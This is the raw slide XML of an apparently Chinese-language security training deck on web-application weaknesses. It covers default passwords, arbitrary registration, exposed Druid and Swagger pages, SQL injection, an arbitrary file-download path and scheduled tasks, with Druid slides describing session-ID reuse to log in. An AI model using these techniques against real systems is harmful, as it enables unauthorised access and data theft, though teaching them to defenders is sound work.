                    <a:pt x="23" y="8"/>
                    <a:pt x="24" y="9"/>
                    <a:pt x="24" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="12"/>
                    <a:pt x="24" y="18"/>
                    <a:pt x="24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7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1370" y="292"/>
              <a:ext cx="92" cy="89"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 92"/>
                <a:gd name="T1" fmla="*/ 89 h 89"/>
                <a:gd name="T2" fmla="*/ 0 w 92"/>
                <a:gd name="T3" fmla="*/ 73 h 89"/>
                <a:gd name="T4" fmla="*/ 36 w 92"/>
                <a:gd name="T5" fmla="*/ 73 h 89"/>
                <a:gd name="T6" fmla="*/ 36 w 92"/>
                <a:gd name="T7" fmla="*/ 52 h 89"/>
                <a:gd name="T8" fmla="*/ 6 w 92"/>
                <a:gd name="T9" fmla="*/ 52 h 89"/>
                <a:gd name="T10" fmla="*/ 6 w 92"/>
                <a:gd name="T11" fmla="*/ 37 h 89"/>
                <a:gd name="T12" fmla="*/ 36 w 92"/>
                <a:gd name="T13" fmla="*/ 37 h 89"/>
                <a:gd name="T14" fmla="*/ 36 w 92"/>
                <a:gd name="T15" fmla="*/ 16 h 89"/>
                <a:gd name="T16" fmla="*/ 0 w 92"/>
                <a:gd name="T17" fmla="*/ 16 h 89"/>
                <a:gd name="T18" fmla="*/ 0 w 92"/>
                <a:gd name="T19" fmla="*/ 0 h 89"/>
                <a:gd name="T20" fmla="*/ 92 w 92"/>
                <a:gd name="T21" fmla="*/ 0 h 89"/>
                <a:gd name="T22" fmla="*/ 92 w 92"/>
                <a:gd name="T23" fmla="*/ 16 h 89"/>
                <a:gd name="T24" fmla="*/ 56 w 92"/>
                <a:gd name="T25" fmla="*/ 16 h 89"/>
                <a:gd name="T26" fmla="*/ 56 w 92"/>
                <a:gd name="T27" fmla="*/ 37 h 89"/>
                <a:gd name="T28" fmla="*/ 87 w 92"/>
                <a:gd name="T29" fmla="*/ 37 h 89"/>
                <a:gd name="T30" fmla="*/ 87 w 92"/>
                <a:gd name="T31" fmla="*/ 52 h 89"/>
                <a:gd name="T32" fmla="*/ 56 w 92"/>
                <a:gd name="T33" fmla="*/ 52 h 89"/>
                <a:gd name="T34" fmla="*/ 56 w 92"/>
                <a:gd name="T35" fmla="*/ 73 h 89"/>
                <a:gd name="T36" fmla="*/ 72 w 92"/>
                <a:gd name="T37" fmla="*/ 73 h 89"/>
                <a:gd name="T38" fmla="*/ 72 w 92"/>
                <a:gd name="T39" fmla="*/ 63 h 89"/>
                <a:gd name="T40" fmla="*/ 92 w 92"/>
                <a:gd name="T41" fmla="*/ 63 h 89"/>
                <a:gd name="T42" fmla="*/ 92 w 92"/>
                <a:gd name="T43" fmla="*/ 89 h 89"/>
                <a:gd name="T44" fmla="*/ 0 w 92"/>
                <a:gd name="T4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2" h="89">
                  <a:moveTo>
                    <a:pt x="0" y="89"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="73"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36" y="73"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36" y="52"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6" y="52"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3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92" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92" y="16"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56" y="16"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87" y="52"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56" y="52"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56" y="73"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72" y="73"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72" y="63"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92" y="63"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92" y="89"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0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18"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1340" y="261"/>
              <a:ext cx="153" cy="151"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 26 w 30"/>
                <a:gd name="T1" fmla="*/ 0 h 29"/>
                <a:gd name="T2" fmla="*/ 0 w 30"/>
                <a:gd name="T3" fmla="*/ 0 h 29"/>
                <a:gd name="T4" fmla="*/ 0 w 30"/>
                <a:gd name="T5" fmla="*/ 29 h 29"/>
                <a:gd name="T6" fmla="*/ 30 w 30"/>
                <a:gd name="T7" fmla="*/ 29 h 29"/>
                <a:gd name="T8" fmla="*/ 30 w 30"/>
                <a:gd name="T9" fmla="*/ 4 h 29"/>
                <a:gd name="T10" fmla="*/ 26 w 30"/>
                <a:gd name="T11" fmla="*/ 0 h 29"/>
                <a:gd name="T12" fmla="*/ 25 w 30"/>
                <a:gd name="T13" fmla="*/ 26 h 29"/>
                <a:gd name="T14" fmla="*/ 5 w 30"/>
                <a:gd name="T15" fmla="*/ 26 h 29"/>
                <a:gd name="T16" fmla="*/ 5 w 30"/>
                <a:gd name="T17" fmla="*/ 4 h 29"/>
                <a:gd name="T18" fmla="*/ 24 w 30"/>
                <a:gd name="T19" fmla="*/ 4 h 29"/>
                <a:gd name="T20" fmla="*/ 25 w 30"/>
                <a:gd name="T21" fmla="*/ 5 h 29"/>
                <a:gd name="T22" fmla="*/ 25 w 30"/>
                <a:gd name="T23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29">
                  <a:moveTo>
                    <a:pt x="26" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0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29"/>
                    <a:pt x="30" y="5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lose/>
                  <a:moveTo>
                    <a:pt x="25" y="26"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="26"/>
                    <a:pt x="5" y="26"/>
                    <a:pt x="5" y="26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5" y="4"/>
                    <a:pt x="25" y="4"/>
                    <a:pt x="25" y="5"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="25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9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1711" y="261"/>
              <a:ext cx="148" cy="151"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 18 w 29"/>
                <a:gd name="T1" fmla="*/ 21 h 29"/>
                <a:gd name="T2" fmla="*/ 18 w 29"/>
                <a:gd name="T3" fmla="*/ 17 h 29"/>
                <a:gd name="T4" fmla="*/ 28 w 29"/>
                <a:gd name="T5" fmla="*/ 17 h 29"/>
                <a:gd name="T6" fmla="*/ 28 w 29"/>
                <a:gd name="T7" fmla="*/ 13 h 29"/>
                <a:gd name="T8" fmla="*/ 18 w 29"/>
                <a:gd name="T9" fmla="*/ 13 h 29"/>
                <a:gd name="T10" fmla="*/ 18 w 29"/>
                <a:gd name="T11" fmla="*/ 9 h 29"/>
                <a:gd name="T12" fmla="*/ 13 w 29"/>
                <a:gd name="T13" fmla="*/ 9 h 29"/>
                <a:gd name="T14" fmla="*/ 13 w 29"/>
                <a:gd name="T15" fmla="*/ 13 h 29"/>
                <a:gd name="T16" fmla="*/ 6 w 29"/>
                <a:gd name="T17" fmla="*/ 13 h 29"/>
                <a:gd name="T18" fmla="*/ 10 w 29"/>
                <a:gd name="T19" fmla="*/ 6 h 29"/>
                <a:gd name="T20" fmla="*/ 29 w 29"/>
                <a:gd name="T21" fmla="*/ 6 h 29"/>
                <a:gd name="T22" fmla="*/ 29 w 29"/>
                <a:gd name="T23" fmla="*/ 3 h 29"/>
                <a:gd name="T24" fmla="*/ 12 w 29"/>
                <a:gd name="T25" fmla="*/ 3 h 29"/>
                <a:gd name="T26" fmla="*/ 14 w 29"/>
                <a:gd name="T27" fmla="*/ 0 h 29"/>
                <a:gd name="T28" fmla="*/ 8 w 29"/>
                <a:gd name="T29" fmla="*/ 0 h 29"/>
                <a:gd name="T30" fmla="*/ 7 w 29"/>
                <a:gd name="T31" fmla="*/ 3 h 29"/>
                <a:gd name="T32" fmla="*/ 0 w 29"/>
                <a:gd name="T33" fmla="*/ 3 h 29"/>
                <a:gd name="T34" fmla="*/ 0 w 29"/>
                <a:gd name="T35" fmla="*/ 6 h 29"/>
                <a:gd name="T36" fmla="*/ 5 w 29"/>
                <a:gd name="T37" fmla="*/ 6 h 29"/>
                <a:gd name="T38" fmla="*/ 1 w 29"/>
                <a:gd name="T39" fmla="*/ 12 h 29"/>
                <a:gd name="T40" fmla="*/ 1 w 29"/>
                <a:gd name="T41" fmla="*/ 14 h 29"/>
                <a:gd name="T42" fmla="*/ 1 w 29"/>
                <a:gd name="T43" fmla="*/ 17 h 29"/>
                <a:gd name="T44" fmla="*/ 13 w 29"/>
                <a:gd name="T45" fmla="*/ 17 h 29"/>
                <a:gd name="T46" fmla="*/ 13 w 29"/>
                <a:gd name="T47" fmla="*/ 21 h 29"/>
                <a:gd name="T48" fmla="*/ 0 w 29"/>
                <a:gd name="T49" fmla="*/ 21 h 29"/>
                <a:gd name="T50" fmla="*/ 0 w 29"/>
                <a:gd name="T51" fmla="*/ 24 h 29"/>
                <a:gd name="T52" fmla="*/ 13 w 29"/>
                <a:gd name="T53" fmla="*/ 24 h 29"/>
                <a:gd name="T54" fmla="*/ 13 w 29"/>
                <a:gd name="T55" fmla="*/ 29 h 29"/>
                <a:gd name="T56" fmla="*/ 18 w 29"/>
                <a:gd name="T57" fmla="*/ 29 h 29"/>
                <a:gd name="T58" fmla="*/ 18 w 29"/>
                <a:gd name="T59" fmla="*/ 24 h 29"/>
                <a:gd name="T60" fmla="*/ 29 w 29"/>
                <a:gd name="T61" fmla="*/ 24 h 29"/>
                <a:gd name="T62" fmla="*/ 29 w 29"/>
                <a:gd name="T63" fmla="*/ 21 h 29"/>
                <a:gd name="T64" fmla="*/ 18 w 29"/>
                <a:gd name="T65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" h="29">
                  <a:moveTo>
                    <a:pt x="18" y="21"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="17"/>
                    <a:pt x="18" y="17"/>
                    <a:pt x="1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4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1"/>
                    <a:pt x="29" y="21"/>
                    <a:pt x="29" y="21"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="18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默认密码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原理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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200" y="1434465"/>
            <a:ext cx="6009640" cy="26803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360" y="1262380"/>
            <a:ext cx="5650865" cy="501967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任意用户注册</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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635" y="2226945"/>
            <a:ext cx="6772275" cy="31642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62635" y="15055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http://127.0.0.1/register</a:t>
            </a:r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任意用户注册</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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635" y="1925320"/>
            <a:ext cx="8942070" cy="347599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druid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>泄露</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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99770" y="151384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http://127.0.0.1/druid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770" y="2306955"/>
            <a:ext cx="4801870" cy="3575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630" y="1600200"/>
            <a:ext cx="6204585" cy="507555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druid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>泄露</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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99770" y="1356360"/>
            <a:ext cx="877252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/>
              <a:t>进入druid管理页面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>后，重点关注的是/druid/weburi.html与/druid/websession.html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6455" y="2293620"/>
            <a:ext cx="7930515" cy="61277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druid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>泄露</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>-uri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>监控</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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99770" y="1356360"/>
            <a:ext cx="877252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/>
              <a:t>可以看到创建了连接池的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>URI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，可以尝试寻找未授权访问的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>api</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>接口。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9760" y="1998345"/>
            <a:ext cx="8852535" cy="429323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druid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>泄露</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>-session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>监控</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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99770" y="1356360"/>
            <a:ext cx="8772525" cy="454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t>有时候可以看到已经连接的SESSIONID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN"/>
              <a:t>，通过复用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SESSION</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，登录</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>系统。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4680" y="1974850"/>
            <a:ext cx="7995920" cy="13779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280" y="3352800"/>
            <a:ext cx="3769360" cy="334772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Swagger-ui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>泄露</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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31825" y="1207770"/>
            <a:ext cx="11134090" cy="8432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/>
              <a:t>Swagger 是一个开源的 API 设计和文档工具，它可以帮助开发人员更快、更简单地设计、构建、文档化和测试 RESTful API。Swagger 可以自动生成交互式 API 文档、客户端 SDK、服务器 stub 代码等，从而使开发人员更加容易地开发、测试和部署 API。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37235" y="2481580"/>
            <a:ext cx="6243955" cy="1246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/>
              <a:t>http://127.0.0.1/swagger-ui.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>   //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>单体</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>版</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>http://localhost:8080/swagger-resources</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>前后分离</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>版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400" y="4158615"/>
            <a:ext cx="7543800" cy="20935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1830" y="4330700"/>
            <a:ext cx="3727450" cy="202565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Swagger-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>原理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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770" y="1762125"/>
            <a:ext cx="2724150" cy="11112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275" y="1706880"/>
            <a:ext cx="3714750" cy="13906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" y="3528060"/>
            <a:ext cx="11169650" cy="253365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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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8780" y="1233170"/>
            <a:ext cx="11393805" cy="27901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655" y="4146550"/>
            <a:ext cx="6096000" cy="253365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1655892"/>
            <a:ext cx="12191999" cy="3546216"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId1"/>
            <a:stretch>
              <a:fillRect t="-6000" b="-5000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0" y="1655892"/>
            <a:ext cx="12191999" cy="3546216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 t="-6000" b="-5000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5133217" y="3239439"/>
            <a:ext cx="719255" cy="37901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01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668" y="2967981"/>
            <a:ext cx="2926080" cy="922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752255" y="0"/>
            <a:ext cx="6847965" cy="6858000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 4180"/>
              <a:gd name="T1" fmla="*/ 0 h 4740"/>
              <a:gd name="T2" fmla="*/ 1674 w 4180"/>
              <a:gd name="T3" fmla="*/ 2337 h 4740"/>
              <a:gd name="T4" fmla="*/ 0 w 4180"/>
              <a:gd name="T5" fmla="*/ 4740 h 4740"/>
              <a:gd name="T6" fmla="*/ 2459 w 4180"/>
              <a:gd name="T7" fmla="*/ 4740 h 4740"/>
              <a:gd name="T8" fmla="*/ 4180 w 4180"/>
              <a:gd name="T9" fmla="*/ 2337 h 4740"/>
              <a:gd name="T10" fmla="*/ 2459 w 4180"/>
              <a:gd name="T11" fmla="*/ 0 h 4740"/>
              <a:gd name="T12" fmla="*/ 0 w 4180"/>
              <a:gd name="T13" fmla="*/ 0 h 4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80" h="4740">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1674" y="2337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2459" y="4740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4180" y="2337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2459" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="0162A7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Freeform 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8182135" y="0"/>
            <a:ext cx="3625490" cy="3381255"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2213 w 2213"/>
              <a:gd name="T1" fmla="*/ 2337 h 2337"/>
              <a:gd name="T2" fmla="*/ 1722 w 2213"/>
              <a:gd name="T3" fmla="*/ 2337 h 2337"/>
              <a:gd name="T4" fmla="*/ 0 w 2213"/>
              <a:gd name="T5" fmla="*/ 0 h 2337"/>
              <a:gd name="T6" fmla="*/ 492 w 2213"/>
              <a:gd name="T7" fmla="*/ 0 h 2337"/>
              <a:gd name="T8" fmla="*/ 2213 w 2213"/>
              <a:gd name="T9" fmla="*/ 2337 h 2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13" h="2337">
                <a:moveTo>
                  <a:pt x="2213" y="2337"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1722" y="2337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="492" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2213" y="2337"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="BC282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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入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原理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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635" y="1605915"/>
            <a:ext cx="6356350" cy="22415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70" y="4056380"/>
            <a:ext cx="7747000" cy="2133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340" y="2002790"/>
            <a:ext cx="4904105" cy="115824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任意文件下载</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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99770" y="1591310"/>
            <a:ext cx="8270240" cy="509270"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l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onsolas" panose="020B0609020204030204"/>
                <a:ea typeface="Consolas" panose="020B0609020204030204"/>
              </a:rPr>
              <a:t>/common/download/resource?resource=/profile/1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="Consolas" panose="020B0609020204030204"/>
                <a:ea typeface="Consolas" panose="020B0609020204030204"/>
              </a:rPr>
              <a:t>txt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600">
              <a:latin typeface="Consolas" panose="020B0609020204030204"/>
              <a:ea typeface="Consolas" panose="020B06090202040302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350" y="2339340"/>
            <a:ext cx="2895600" cy="201930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任意文件下载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原理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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42950" y="1325880"/>
            <a:ext cx="8270240" cy="509270"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l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onsolas" panose="020B0609020204030204"/>
                <a:ea typeface="Consolas" panose="020B0609020204030204"/>
              </a:rPr>
              <a:t>/common/download/resource?resource=/profile/1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="Consolas" panose="020B0609020204030204"/>
                <a:ea typeface="Consolas" panose="020B0609020204030204"/>
              </a:rPr>
              <a:t>txt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600">
              <a:latin typeface="Consolas" panose="020B0609020204030204"/>
              <a:ea typeface="Consolas" panose="020B060902020403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770" y="1835150"/>
            <a:ext cx="8667750" cy="389255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任意文件下载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原理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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42950" y="1325880"/>
            <a:ext cx="8270240" cy="509270"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l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onsolas" panose="020B0609020204030204"/>
                <a:ea typeface="Consolas" panose="020B0609020204030204"/>
              </a:rPr>
              <a:t>/common/download/resource?resource=/profile/1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="Consolas" panose="020B0609020204030204"/>
                <a:ea typeface="Consolas" panose="020B0609020204030204"/>
              </a:rPr>
              <a:t>txt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600">
              <a:latin typeface="Consolas" panose="020B0609020204030204"/>
              <a:ea typeface="Consolas" panose="020B060902020403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770" y="1835150"/>
            <a:ext cx="8667750" cy="389255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定时</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>任务</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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99770" y="1393825"/>
            <a:ext cx="10242550" cy="1689735"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l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+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在实际项目开发中Web应用有一类不可缺少的，那就是定时任务。 定时任务的场景可以说非常广泛，比如某些视频网站，购买会员后，每天会给会员送成长值，每月会给会员送一些电影券； 比如在保证最终一致性的场景中，往往利用定时任务调度进行一些比对工作；比如一些定时需要生成的报表、邮件；比如一些需要定时清理数据的任务等。 所以我们提供方便友好的web界面，实现动态管理任务，可以达到动态控制定时任务启动、暂停、重启、删除、添加、修改等操作，极大地方便了开发过程。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600">
              <a:latin typeface="+mn-ea"/>
              <a:cs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86130" y="3361690"/>
            <a:ext cx="10155555" cy="1978660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="0" indent="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>后台添加定时任务处理类（支持</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Bean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>调用、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>类调用）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea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0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Bean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>调用示例：需要添加对应</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Bean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0">
                <a:solidFill>
